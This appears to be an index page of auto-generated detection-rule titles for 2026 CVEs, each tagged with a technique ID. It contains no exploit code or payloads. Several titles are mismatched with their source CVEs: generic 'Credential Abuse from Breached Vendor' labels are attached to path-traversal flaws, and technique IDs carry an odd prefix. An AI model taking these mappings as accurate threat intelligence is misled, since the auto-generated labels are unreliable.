🛡️ 2 more rules via /detect
CVE-2026-45001: OpenClaw Gateway Bypass for Operator Settings
🌐 NVDT1505.003 — Persistence
Auto-generated from OpenClaw CVE-2026-45001: Gateway Bypass Exposes Operator ...
🛡️ 2 more rules via /detect
CVE-2026-44995: OpenClaw Arbitrary Code Execution via NODE_OPTIONS
🌐 NVDT1059.004 — Execution
Auto-generated from OpenClaw CVE-2026-44995: Arbitrary Code Execution via Env...
🛡️ 2 more rules via /detect
JetBrains TeamCity Authenticated API Exposure - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from JetBrains TeamCity CVE-2026-44413: Authenticated Exposure...
🛡️ 2 more rules via /detect
Bitwarden SCIM API Key Retrieval via Unauthenticated Session - CVE-2026-43640
🌐 NVDT1539 — Credential Access
Auto-generated from Bitwarden Server CVE-2026-43640: SCIM API Key Exposed Wit...
🛡️ 2 more rules via /detect
Bitwarden Cloud Organization Takeover Attempt - CVE-2026-43639
🌐 NVDT1190 — Initial Access
Auto-generated from Bitwarden Server CVE-2026-43639 Allows Organization Takeo...
🛡️ 1 more rules via /detect
CVE-2026-42860 - Open edX Enterprise Service SSRF via SAML Metadata Sync
🌐 NVDT1190 — Initial Access
Auto-generated from Open edX Enterprise Service Vulnerability Allows SSRF via...
🛡️ 2 more rules via /detect
Open edX SSRF via sync_provider_data endpoint - CVE-2026-42858
🌐 NVDT1557.001 — Lateral Movement
Auto-generated from Open edX Platform SSRF via Unvalidated URL Parameter (CVE...
🛡️ 2 more rules via /detect
CVE-2026-42315: pyLoad Directory Traversal via set_package_data API
🌐 NVDT1578.002 — Defense Evasion
Auto-generated from CVE-2026-42315: pyLoad Directory Traversal Puts Data at Risk
🛡️ 2 more rules via /detect
CVE-2026-42313: pyLoad Proxy Configuration Change
🌐 NVDT1572 — Command and Control
Auto-generated from CVE-2026-42313: pyLoad Proxy Bypass Exposes Outbound Traffic
🛡️ 2 more rules via /detect
CVE-2026-41431: Zen Browser Unsigned MAR Update Download
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41431: Zen Browser Updater Strips Signature Veri...
🛡️ 2 more rules via /detect
MLflow SSRF to Internal Service Access - CVE-2026-2393
🌐 NVDT1190 — Initial Access
Auto-generated from MLflow SSRF Vulnerability (CVE-2026-2393) Exposes Interna...
🛡️ 2 more rules via /detect
CVE-2026-7816: pgAdmin 4 OS Command Injection via Query Export
🌐 NVDT1190 — Initial Access
Auto-generated from pgAdmin 4 CVE-2026-7816: OS Command Injection via Query E...
🛡️ 2 more rules via /detect
CVE-2026-7813: pgAdmin 4 Unauthorized Access to Server Objects
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2026-7813: Critical Authorization Bypass in pgAdmin 4...
🛡️ 2 more rules via /detect
Grav Unauthenticated Admin Registration via Login Plugin - CVE-2026-42613
🌐 NVDT1190 — Initial Access
Auto-generated from Grav Critical Vulnerability Allows Unauthenticated Admin ...
🛡️ 1 more rules via /detect
Grav RCE via Malicious Plugin Upload - CVE-2026-42607
🌐 NVDT1190 — Initial Access
Auto-generated from Grav RCE via Malicious Plugin Upload (CVE-2026-42607)
🛡️ 2 more rules via /detect
Cockpit CVE-2026-4802: Command Injection via Log UI Parameters
🌐 NVDT1190 — Initial Access
Auto-generated from Cockpit CVE-2026-4802: Remote Command Execution via Unsan...
🛡️ 2 more rules via /detect
CVE-2025-10470: Magic Link Excessive Invalid Authentication Attempts
🌐 NVDT1499 — Impact
Auto-generated from CVE-2025-10470: Magic Link DoS via Uncontrolled Memory Gr...
🛡️ 1 more rules via /detect
Credential Abuse from Breached Vendor — CVE-2026-41951
🌐 NVDT1078.004 — Initial Access
Auto-generated from GROWI Path Traversal (CVE-2026-41951) Allows EJS Template...
🛡️ 3 more rules via /detect
CVE-2026-40636 - Dell ECS/ObjectScale Hard-Coded Credential Filesystem Access
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from Dell ECS, ObjectScale Hit by Critical Hard-Coded Credenti...
🛡️ 2 more rules via /detect
Dell Automation Platform Missing Authorization - Potential Exploit Attempt (CVE-2026-32658)
🌐 NVDT1190 — Initial Access
Auto-generated from Dell Automation Platform: Missing Authorization Vulnerabi...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-8260
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DCS-935L CVE-2026-8260: Remote Buffer Overflow in ...
🛡️ 2 more rules via /detect
CVE-2022-50944 - Aero CMS Authenticated PHP Code Injection via Image Upload
🌐 NVDT1190 — Initial Access
Auto-generated from Aero CMS 0.0.1 Vulnerability Allows Authenticated PHP Cod...
🛡️ 2 more rules via /detect
CVE-2021-47949 - CyberPanel File Manager Symlink Attack
🌐 NVDT1505.003 — Persistence
Auto-generated from CyberPanel 2.1 RCE via Symlink Attack (CVE-2021-47949)
🛡️ 2 more rules via /detect
CVE-2021-47943 - TextPattern CMS PHP Shell Upload
🌐 NVDT1190 — Initial Access
Auto-generated from TextPattern CMS RCE (CVE-2021-47943) Allows Authenticated...
🛡️ 2 more rules via /detect
WordPress Survey & Poll Plugin SQL Injection via wp_sap Cookie - CVE-2021-47941
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin Survey & Poll SQLi Puts Data at Risk
🛡️ 2 more rules via /detect
CVE-2021-47940 - WordPress Download From Files Unauthenticated File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin Download From Files: Critical Unauthenti...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2021-47939
🌐 NVDT1190 — Initial Access
Auto-generated from Evolution CMS RCE (CVE-2021-47939) Allows Authenticated C...
🛡️ 2 more rules via /detect
CVE-2021-47938: ImpressCMS Authenticated RCE via autotasks
🌐 NVDT1190 — Initial Access
Auto-generated from ImpressCMS 1.4.2 RCE: Authenticated Attackers Can Execute...
🛡️ 2 more rules via /detect
e107 CMS Theme Upload Web Shell - CVE-2021-47937
🌐 NVDT1190 — Initial Access
Auto-generated from e107 CMS RCE (CVE-2021-47937) Allows Authenticated Theme ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2021-47936
🌐 NVDT1190 — Initial Access
Auto-generated from OpenCATS 0.9.4 Critical RCE via Malicious Resume Uploads
🛡️ 2 more rules via /detect
CVE-2021-47935: Sentry Authenticated RCE via Pickle in Audit Log
🌐 NVDT1190 — Initial Access
Auto-generated from Sentry 8.2.0 RCE: Authenticated Superusers Can Execute Ar...
🛡️ 2 more rules via /detect
CVE-2021-47933: MStore API Unauthenticated File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress MStore API Critical RCE: Unauthenticated File U...
🛡️ 2 more rules via /detect
CVE-2021-47932 - TheCartPress Unauthenticated Admin Creation
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress TheCartPress Unauthenticated Admin Creation (CV...
CVE-2021-47930: Balbooa Forms Builder Unauthenticated SQLi Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2021-47930: Unauthenticated SQLi in Balbooa Joomla Fo...
🛡️ 1 more rules via /detect
CVE-2021-47928 - Opencart TMD Vendor System Blind SQLi via product_id
🌐 NVDT1190 — Initial Access
Auto-generated from Opencart TMD Vendor System Blind SQLi Exposes User Data
🛡️ 2 more rules via /detect
CVE-2021-47923 - OpenCart Session Fixation Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from OpenCart 3.0.3.8 Session Fixation Vulnerability (CVE-2021...
🛡️ 1 more rules via /detect
CVE-2026-8234: EFM ipTIME A8004T WifiBasicSet Buffer Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from EFM ipTIME A8004T Vulnerability: Remote Stack-Based Buffe...
🛡️ 1 more rules via /detect
CVE-2026-8216: Canias ERP Remote Authentication Bypass via iasServerRemoteInterface.doAction
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8216: Canias ERP Remote Authentication Bypass Ex...
🛡️ 1 more rules via /detect
CVE-2026-42606: AzuraCast Unauthenticated Account Takeover via X-Forwarded-Host Poisoning
🌐 NVDT1190 — Initial Access
Auto-generated from AzuraCast CVE-2026-42606: Unauthenticated Account Takeove...
🛡️ 2 more rules via /detect
CVE-2026-42605 - AzuraCast Path Traversal to RCE via Media Upload
🌐 NVDT1190 — Initial Access
Auto-generated from AzuraCast RCE via Path Traversal (CVE-2026-42605)
🛡️ 2 more rules via /detect
CVE-2026-42575: apko Package Mismatch Detection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42575: apko Container Builder Silently Accepts M...
🛡️ 2 more rules via /detect
CVE-2026-42574: apko Symlink Traversal to Host Path Write
🌐 NVDT1570 — Lateral Movement
Auto-generated from CVE-2026-42574: apko Symlink Traversal Allows Host Path W...
🛡️ 2 more rules via /detect
CVE-2026-42569 - phpVMS Unauthenticated Access to Legacy Import Feature
🌐 NVDT1190 — Initial Access
Auto-generated from phpVMS Critical Vulnerability (CVE-2026-42569) Allows Una...
🛡️ 2 more rules via /detect
Plainpad CVE-2026-42562 User Privilege Escalation
🌐 NVDT1548.002 — Privilege Escalation
Auto-generated from Plainpad CVE-2026-42562 Allows Low-Privilege Admin Escala...
🛡️ 1 more rules via /detect
CVE-2026-3828 - Hikvision Switch Authenticated RCE via Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Hikvision Switches: Authenticated RCE in Discontinued Pro...
🛡️ 2 more rules via /detect
Patreon OAuth Identity Merging via Vulnerable Auth Library — CVE-2026-42560
🌐 NVDT1078.004 — Initial Access
Auto-generated from CVE-2026-42560: Critical Patreon OAuth Flaw Merges User I...
🛡️ 2 more rules via /detect
CVE-2026-42301: pyp2spec Unescaped RPM Macro Execution via PyPI Metadata
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-42301: Malicious Code Execution Via pyp2spec RPM...
🛡️ 2 more rules via /detect
CVE-2026-42296: Argo Workflows Host Network Bypass
🌐 NVDT1578.002 — Defense Evasion
Auto-generated from CVE-2026-42296: Argo Workflows Bypass Grants Host Network...
🛡️ 2 more rules via /detect
LiquidJS DoS via Circular Block Reference - LiquidJS CVE-2026-41311
🌐 NVDT1499 — Impact
Auto-generated from LiquidJS CVE-2026-41311: DoS Vulnerability in Template En...
🛡️ 1 more rules via /detect
CVE-2026-6665 PgBouncer SCRAM Stack Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from PgBouncer SCRAM Vulnerability (CVE-2026-6665) Allows Stac...
🛡️ 1 more rules via /detect
CVE-2026-6664 PgBouncer SCRAM Auth Packet Crash - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from PgBouncer Integer Overflow (CVE-2026-6664) Leads to Remot...
🛡️ 2 more rules via /detect
CVE-2026-41705: Spring AI MilvusVectorStore Filter Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41705: Spring AI MilvusVectorStore Vulnerable to...
🛡️ 1 more rules via /detect
CVE-2026-44313 - Linkwarden SSRF to Internal Network Access
🌐 NVDT1190 — Initial Access
Auto-generated from Linkwarden SSRF Vulnerability (CVE-2026-44313) Allows Int...
🛡️ 2 more rules via /detect
CVE-2026-42556: Postiz Stored XSS via Tampered Post Preview
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42556: Postiz AI Tool Vulnerability Allows Store...
🛡️ 2 more rules via /detect
Termix Container ID Injection RCE - CVE-2026-42454
🌐 NVDT1190 — Initial Access
Auto-generated from Termix RCE via Container ID Injection (CVE-2026-42454)
🛡️ 2 more rules via /detect
Termix CVE-2026-42452 - Temporary JWT Used for Unauthorized Access
🌐 NVDT1190 — Initial Access
Auto-generated from Termix CVE-2026-42452 Bypasses 2FA with Temporary JWT
🛡️ 1 more rules via /detect
Sentry SAML SSO Account Takeover Attempt - CVE-2026-42354
🌐 NVDT1190 — Initial Access
Auto-generated from Sentry SAML SSO Critical Vulnerability Allows Account Tak...
🛡️ 1 more rules via /detect
CVE-2026-42352 - pygeoapi OGC API Process Internal Service Access
🌐 NVDT1190 — Initial Access
Auto-generated from pygeoapi RCE: OGC API Vulnerability Exposes Internal Serv...
🛡️ 2 more rules via /detect
CVE-2026-42351: pygeoapi STAC FileSystemProvider Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42351: pygeoapi Path Traversal Exposes Directories
🛡️ 1 more rules via /detect
CVE-2026-42345 - FastGPT Cloud Metadata Bypass via URL Encoding
🌐 NVDT1190 — Initial Access
Auto-generated from FastGPT Vulnerability: Cloud Metadata Bypass via URL Enco...
🛡️ 2 more rules via /detect
CVE-2026-42302: FastGPT Agent Sandbox RCE via Unauthenticated Code-Server Access
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42302: FastGPT Agent Sandbox RCE
🛡️ 2 more rules via /detect
CVE-2026-42298: Malicious PR Dockerfile in Postiz AI Scheduling Tool
🌐 NVDT1608.001 — Initial Access
Auto-generated from CVE-2026-42298: Critical RCE in Postiz AI Scheduling Tool
🛡️ 2 more rules via /detect
CVE-2026-42224: ipl/web XSS - Suspicious URI Query
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42224: ipl/web XSS Vulnerability Impacts Icinga Web
🛡️ 2 more rules via /detect
CVE-2026-41520: Cilium Bugtool Sensitive Data Leak
🌐 NVDT1074 — Discovery
Auto-generated from CVE-2026-41520: Cilium Bugtool Leaks Sensitive WireGuard ...
🛡️ 2 more rules via /detect
CVE-2026-41432: LLM Gateway Stripe Webhook Quota Forgery
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41432: LLM Gateway Stripe Webhook Flaw Allows Qu...
🛡️ 1 more rules via /detect
CVE-2026-42205: Avo Framework Unauthorized Action Execution - Free Tier
🌐 NVDT1505.003 — Persistence
Auto-generated from CVE-2026-42205: Avo Framework Privilege Escalation in Rub...
🛡️ 2 more rules via /detect
CVE-2026-42193: Plunk Unauthenticated SNS Webhook Forgery
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42193: Plunk Email Platform Critical Unauthentic...
🛡️ 2 more rules via /detect
CVE-2026-44400 - MailEnable WebAdmin Authentication Bypass via PersistentLogin Token Replay
🌐 NVDT1190 — Initial Access
Auto-generated from MailEnable WebAdmin Vulnerability Bypasses Authentication...
🛡️ 2 more rules via /detect
SmarterMail LFI to Credential Access - CVE-2026-7807
🌐 NVDT1190 — Initial Access
Auto-generated from SmarterTools SmarterMail CVE-2026-7807: Local File Inclus...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-42189
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42189: Russh SSH Library DoS Vulnerability
🛡️ 2 more rules via /detect
CVE-2026-8178: Redshift JDBC Driver Arbitrary Class Loading via Connection URL
🌐 NVDT1190 — Initial Access
Auto-generated from Amazon Redshift JDBC Driver Vulnerability Allows Remote C...
🛡️ 2 more rules via /detect
CVE-2026-42072: Nornicdb Bolt Port Exposed on LAN
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42072: Nornicdb Exposes Graph Database via Defau...
🛡️ 2 more rules via /detect
CVE-2026-42353: i18next-http-middleware Path Traversal in URI Query
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42353: i18next-http-middleware Path Traversal an...
🛡️ 2 more rules via /detect
CVE-2026-41886: locize SDK Cross-Origin Message Manipulation
🌐 NVDT1189 — Initial Access
Auto-generated from CVE-2026-41886: locize SDK Vulnerability Exposes Apps to ...
🛡️ 2 more rules via /detect
CVE-2026-41883: OmniFaces RCE via Server-Side EL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from OmniFaces RCE: Server-Side EL Injection Poses High Risk
🛡️ 2 more rules via /detect
CVE-2026-41693: i18next-fs-backend Path Traversal Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41693: i18next-fs-backend Path Traversal Exposes...
🛡️ 2 more rules via /detect
CVE-2026-41690: 18next-http-middleware Prototype Pollution via getResourcesHandler
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41690: 18next-http-middleware Prototype Pollutio...
🛡️ 2 more rules via /detect
CVE-2026-41683: i18next-http-middleware Language Header Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41683: i18next-http-middleware Header Injection ...
🛡️ 2 more rules via /detect
CVE-2026-34354 - Akamai GPA TOCTOU Privilege Escalation via /tmp IPC Socket
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Akamai Guardicore Local Privilege Escalation Hits Linux, ...
🛡️ 2 more rules via /detect
RELATE Courseware Timing Attack - CVE-2026-41588
🌐 NVDT1190 — Initial Access
Auto-generated from RELATE Courseware Vulnerability: Critical Timing Attack C...
CVE-2026-41576 - Brave CMS Unescaped Contact Form HTML Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Brave CMS Vulnerability: Phishing via Unescaped Contact Form
🛡️ 1 more rules via /detect
PHPUnit RCE via INI Setting Injection (CVE-2026-41570) - Free Tier
🌐 NVDT1059.007 — Execution
Auto-generated from PHPUnit Vulnerability Allows RCE via INI Setting Injection
🛡️ 2 more rules via /detect
CVE-2026-44334: PraisonAI Unsanctioned Tool Import via POST /v1/recipes/run
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44334: PraisonAI Multi-Agent System Vulnerable t...
🛡️ 2 more rules via /detect
CVE-2026-41512 - ai-scanner JavaScript Injection via PlaywrightService
🌐 NVDT1190 — Initial Access
Auto-generated from ai-scanner RCE: Critical JavaScript Injection in BrowserA...
🛡️ 1 more rules via /detect
CVE-2026-41507: math-codegen RCE via Function constructor injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41507: math-codegen RCE Exposes Apps to Arbitrar...
🛡️ 2 more rules via /detect
Suspicious File Download via Email
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2026-41497: PraisonAI Multi-Agent System Critical RCE
🛡️ 2 more rules via /detect
CVE-2026-41496: PraisonAI SQL Injection via table_prefix parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41496: PraisonAI SQL Injection Impacts Multiple ...
🛡️ 2 more rules via /detect
Dapr CVE-2026-41491: Path Traversal in Service Invocation
🌐 NVDT1071.001 — Lateral Movement
Auto-generated from Dapr CVE-2026-41491: ACL Bypass via Path Traversal
🛡️ 1 more rules via /detect
CVE-2025-66467: MinIO Bucket Access via Reused Credentials
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2025-66467: MinIO Policy Cleanup Flaw in Apache Cloud...
🛡️ 2 more rules via /detect
CVE-2026-8153 - Universal Robots PolyScope OS Command Injection via Dashboard Server
🌐 NVDT1190 — Initial Access
Auto-generated from Universal Robots PolyScope Critical OS Command Injection ...
🛡️ 1 more rules via /detect
Tenda CX12L formSetPPTPServer Stack Buffer Overflow - CVE-2026-8138
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda CX12L Stack Buffer Overflow (CVE-2026-8138) Risks R...
🛡️ 1 more rules via /detect
CVE-2026-8137 Totolink X5000R DDNS Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink X5000R Buffer Overflow (CVE-2026-8137) Exposed
🛡️ 1 more rules via /detect
CVE-2026-8133: FilePress Shares Filelist API SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8133: zyx0814 FilePress SQL Injection Exploited
🛡️ 2 more rules via /detect
SQL Injection in CodeAstro Leave Management login.php - CVE-2026-8132
🌐 NVDT1190 — Initial Access
Auto-generated from CodeAstro Leave Management System SQLi (CVE-2026-8132)
🛡️ 2 more rules via /detect
CVE-2026-8131: SourceCodester SUP Online Shopping SQL Injection via replymsg.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8131: SourceCodester SUP Online Shopping SQL Inj...
🛡️ 2 more rules via /detect
CVE-2026-8130 SourceCodester SUP Online Shopping SQLi via message.php
🌐 NVDT1190 — Initial Access
Auto-generated from SourceCodester SUP Online Shopping SQLi: CVE-2026-8130 Ex...
🛡️ 2 more rules via /detect
SQL Injection in SourceCodester SUP Online Shopping wishlist.php - CVE-2026-8129
🌐 NVDT1190 — Initial Access
Auto-generated from SourceCodester SUP Online Shopping SQL Injection (CVE-202...
🛡️ 2 more rules via /detect
CVE-2026-43940: electerm Path Traversal to RCE via load-widget.js
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43940: electerm Path Traversal Leads to RCE
🛡️ 2 more rules via /detect
CVE-2026-42275 - zrok WebDAV Path Traversal via Symlink
🌐 NVDT1190 — Initial Access
Auto-generated from zrok WebDAV Vulnerability (CVE-2026-42275) Allows Remote ...
🛡️ 2 more rules via /detect
CVE-2026-42264 - Axios Prototype Pollution via HTTP Adapter Properties
🌐 NVDT1059.004 — Execution
Auto-generated from Axios Prototype Pollution: Critical Vulnerability Exposes...
🛡️ 2 more rules via /detect
CVE-2026-41900: OpenLearnX RCE - Suspicious Code Execution
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-41900: OpenLearnX RCE Allows Sandbox Escape and ...
🛡️ 2 more rules via /detect
CVE-2026-41501 - Electerm Command Injection via npm install
🌐 NVDT1190 — Initial Access
Auto-generated from Electerm Critical Command Injection Flaw Patched (CVE-202...
🛡️ 1 more rules via /detect
CVE-2026-41500: Electerm Command Injection via runMac()
🌐 NVDT1059.004 — Execution
Auto-generated from electerm CVE-2026-41500: Critical Command Injection in Te...
🛡️ 1 more rules via /detect
CVE-2026-8128: SourceCodester SUP Online Shopping SQL Injection via viewmsg.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8128: SourceCodester SUP Online Shopping SQLi Ex...
🛡️ 2 more rules via /detect
SourceCodester Comment System post_comment.php SQLi Attempt - CVE-2026-8126
🌐 NVDT1190 — Initial Access
Auto-generated from SourceCodester Comment System SQLi Vulnerability (CVE-202...
🛡️ 2 more rules via /detect
CVE-2026-6411 - MAXHUB Pivot Client Hardcoded AES Key Decryption
🌐 NVDT1190 — Initial Access
Auto-generated from MAXHUB Pivot Client Vulnerability Exposes Tenant Emails, ...
🛡️ 2 more rules via /detect
Azure DevOps Information Disclosure Attempt - CVE-2026-42826
🌐 NVDT1190 — Initial Access
Auto-generated from Azure DevOps Critical Info Disclosure: CVE-2026-42826
🛡️ 1 more rules via /detect
CVE-2026-41105: Azure Notification Service SSRF Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41105: Azure Notification Service SSRF Allows Pr...
🛡️ 2 more rules via /detect
OpenStack Cyborg Unauthenticated API Access for FPGA Reprogramming - CVE-2026-40213
🌐 NVDT1078.002 — Privilege Escalation
Auto-generated from OpenStack Cyborg Flaw Allows FPGA Reprogramming via Unaut...
🛡️ 2 more rules via /detect
CVE-2026-35435 - Azure AI Foundry M365 Unauthorized Network Privilege Escalation
🌐 NVDT1190 — Initial Access
Auto-generated from Azure AI Foundry M365 Flaw Allows Network Privilege Escal...
🛡️ 1 more rules via /detect
CVE-2026-35428 - Azure Cloud Shell Command Injection
🌐 NVDT1059.004 — Execution
Auto-generated from Azure Cloud Shell Critical Command Injection: CVE-2026-35...
🛡️ 2 more rules via /detect
CVE-2026-34327 - Microsoft Partner Center External Resource Reference Vulnerability
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft Partner Center Vulnerability Allows Spoofing (C...
🛡️ 1 more rules via /detect
CVE-2026-33844 - Azure Managed Instance for Apache Cassandra RCE - Input Validation Flaw
🌐 NVDT1190 — Initial Access
Auto-generated from Azure Managed Instance for Apache Cassandra RCE: Critical...
🛡️ 2 more rules via /detect
Microsoft Teams Improper Authorization Information Disclosure - CVE-2026-33823
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft Teams Critical Auth Flaw Exposes Info (CVE-2026...
🛡️ 2 more rules via /detect
CVE-2026-33111 - Copilot Chat Command Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft Copilot Chat Command Injection Vulnerability Di...
🛡️ 2 more rules via /detect
CVE-2026-33109: Azure Managed Instance for Apache Cassandra RCE via Improper Access Control
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-33109: Critical RCE in Azure Managed Instance fo...
🛡️ 2 more rules via /detect
CVE-2026-32207 - Azure ML XSS - Malicious Script Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Azure Machine Learning XSS Exposes Data, Allows Spoofing
🛡️ 2 more rules via /detect
CVE-2026-26164 M365 Copilot Injection - Potential Information Disclosure
🌐 NVDT1190 — Initial Access
Auto-generated from M365 Copilot Injection Vulnerability CVE-2026-26164 Allow...
🛡️ 1 more rules via /detect
M365 Copilot Information Disclosure Attempt - CVE-2026-26129
🌐 NVDT1190 — Initial Access
Auto-generated from M365 Copilot Vulnerability CVE-2026-26129 Exposes Informa...
🛡️ 1 more rules via /detect
CVE-2026-8098: SQL Injection in code-projects Feedback System checklogin.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8098: SQL Injection in code-projects Feedback Sy...
🛡️ 2 more rules via /detect
CVE-2026-42449: n8n-MCP SSRF via IPv6 Mapped Address to Cloud Metadata
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42449: n8n-MCP SSRF Bypasses IPv6 Checks
🛡️ 3 more rules via /detect
CVE-2026-42047: Inngest serve() handler exposed environment variables via non-standard HTTP methods
🌐 NVDT1040 — Credential Access
Auto-generated from CVE-2026-42047: Inngest Exposes Environment Variables via...
🛡️ 2 more rules via /detect
CVE-2026-43510: Unauthorized Domain Manager Assignment Attempt on manage.get.gov
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43510: CISA's manage.get.gov Domain Manager Vuln...
🛡️ 1 more rules via /detect
CVE-2026-42239 Budibase Account Takeover via XSS Cookie Manipulation
🌐 NVDT1189 — Initial Access
Auto-generated from Budibase Low-Code Platform Vulnerability Allows Full Acco...
🛡️ 2 more rules via /detect
CVE-2026-8083: SQL Injection in SourceCodester Pharmacy System /ajax.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8083: SQL Injection in SourceCodester Pharmacy S...
🛡️ 2 more rules via /detect
CVE-2026-44742: Postorius HTML Injection in Message Subject
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44742: Postorius HTML Injection Exploited In The...
🛡️ 1 more rules via /detect
CVE-2026-44244 - GitPython hooksPath Injection RCE
🌐 NVDT1059.006 — Execution
Auto-generated from GitPython CVE-2026-44244 Allows Remote Code Execution via...
🛡️ 2 more rules via /detect
CVE-2026-42284: GitPython RCE via Malicious Clone Command Injection
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2026-42284: GitPython Vulnerability Allows Remote Cod...
🛡️ 1 more rules via /detect
CVE-2026-42215: GitPython Arbitrary Command Execution via upload_pack/receive_pack kwargs
🌐 NVDT1059.006 — Execution
Auto-generated from CVE-2026-42215: GitPython Arbitrary Command Execution Vul...
🛡️ 1 more rules via /detect
FreeScout CVE-2026-41906: Unauthorized Customer Data Binding
🌐 NVDT1190 — Initial Access
Auto-generated from FreeScout CVE-2026-41906: Agent Can Expose Hidden Custome...
🛡️ 1 more rules via /detect
FreeScout CVE-2026-41905 SSRF via Redirect Logic
🌐 NVDT1190 — Initial Access
Auto-generated from FreeScout CVE-2026-41905: Server-Side Request Forgery via...
🛡️ 2 more rules via /detect
CVE-2026-41904: FreeScout Mailbox Auto-Reply XSS Payload
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41904: FreeScout XSS Delivers Payloads via Auto-...
🛡️ 2 more rules via /detect
CVE-2026-41902: FreeScout Indefinite Invite Hash Account Takeover
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41902: FreeScout Invite Hash Vulnerability Allow...
🛡️ 2 more rules via /detect
CVE-2026-37709: Snipe-IT RCE via UploadedFilesController
🌐 NVDT1190 — Initial Access
Auto-generated from Snipe-IT CVE-2026-37709: Critical RCE via Insecure Permis...
🛡️ 2 more rules via /detect
CVE-2026-7415: Yarbo Robot Anonymous MQTT Connection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7415: Yarbo Robot Firmware Exposes Sensitive Dat...
🛡️ 2 more rules via /detect
CVE-2026-7413: Yarbo Firmware Hidden Backdoor Access
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7413: Hidden Backdoor Found in Yarbo Firmware
🛡️ 2 more rules via /detect
CVE-2026-41688: Wallos SSRF Bypass via DNS Rebinding
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41688: Wallos SSRF Bypass via DNS Rebinding
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-41505
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41505: RELATE Courseware Package Suffers Predict...
🛡️ 2 more rules via /detect
Credential Abuse from Breached Vendor — CVE-2026-41589
🌐 NVDT1078.004 — Initial Access
Auto-generated from CVE-2026-41589: Critical Path Traversal in Wish SSH Serve...
🛡️ 1 more rules via /detect
CVE-2026-41554 - Bricks Builder Reflected XSS via 'bricks_element_render_shortcode'
🌐 NVDT1190 — Initial Access
Auto-generated from Bricks Builder Flaw: CVE-2026-41554 Exposes Websites to R...
🛡️ 2 more rules via /detect
CVE-2026-41490: Dagster Dynamic Partition SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Dagster Orchestration Platform Vulnerable to SQL Injectio...
🛡️ 2 more rules via /detect
DivvyDrive XSS Attempt via Specific URI - CVE-2026-6002
🌐 NVDT1190 — Initial Access
Auto-generated from DivvyDrive XSS Vulnerability (CVE-2026-6002) Poses High Risk
🛡️ 1 more rules via /detect
CVE-2026-6508: Liderahenk Origin Validation Error - Unauthenticated Access Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6508: Liderahenk Origin Validation Error Allows ...
🛡️ 2 more rules via /detect
